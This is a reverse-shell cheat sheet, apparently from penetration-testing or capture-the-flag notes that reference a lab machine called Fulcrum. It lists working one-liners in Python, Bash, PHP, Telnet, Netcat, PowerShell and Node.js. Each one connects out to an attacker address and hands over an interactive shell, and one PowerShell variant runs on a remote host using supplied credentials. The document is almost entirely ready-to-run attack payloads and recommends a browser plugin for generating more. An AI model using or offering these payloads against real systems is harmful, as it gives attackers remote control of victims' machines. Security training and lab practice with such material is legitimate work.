Python
1
| python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.175",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
Bash
1
| /bin/bash -c 'bash -i >& /dev/tcp/<attacker_IP>/<attacker_PORT> 0>&1'
|
PHP
1
2
3
4
| # Example 1
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1'");?>
# Example 2
php -r '$sock=fsockopen(“<attacker_IP>”,<attacker_PORT>); exec(“/bin/sh -I <&3 >&3 2>&3”);'
|
Example: Fulcrum
Telnet
1
| telnet <attacker_IP> 4444 | /bin/bash | telnet <attacker_IP> 4445
|
Netcat
1
| nc <attacker_IP> <attacker_PORT> -e /bin/sh
|
Netcat w/o “-e” option
1
| rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -I 2>&1 | nc <attacker_IP> <attacker_PORT> > /tmp/f
|
Powershell
From a non-powershell cli, we can execute our reverse shell with this command:
1
| powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.16.3",2345);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
If we are on a powershell cli, we can execute this one instead:
1
| Invoke-Command -ComputerName file.fulcrum.local -Credential $Creds -ScriptBlock { $client = New-Object System.Net.Sockets.TCPClient('10.10.16.3',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }
|
Examples: Fulcrum
Node JS
1
2
3
4
5
6
7
8
9
10
11
12
| (function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(443, "10.10.14.2", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
|
Firefox Plugin
An excellent plugin to craft different payloads as Reverse Shells directly from firefox: hacktools